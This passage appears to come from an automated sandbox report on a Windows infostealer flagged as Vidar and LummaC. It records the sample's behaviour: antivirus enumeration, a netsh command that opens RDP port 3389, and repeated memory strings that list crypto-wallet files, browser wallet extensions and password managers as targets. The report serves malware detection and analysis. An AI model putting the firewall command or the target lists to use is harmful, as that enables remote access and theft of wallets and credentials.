Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Queries volume information: C:\ProgramData\BGDGHJEHJJ.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Queries volume information: C:\ProgramData\GIJEGDAKEH.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Queries volume information: C:\ProgramData\BKJKEBGDHD.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

3_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Source: RegAsm.exe, 00000003.00000002.2843926018.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.000000000165A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ab5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ab5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2843394238.0000000000FDD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: RegAsm.exe, 00000003.00000002.2843394238.0000000000FDD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session 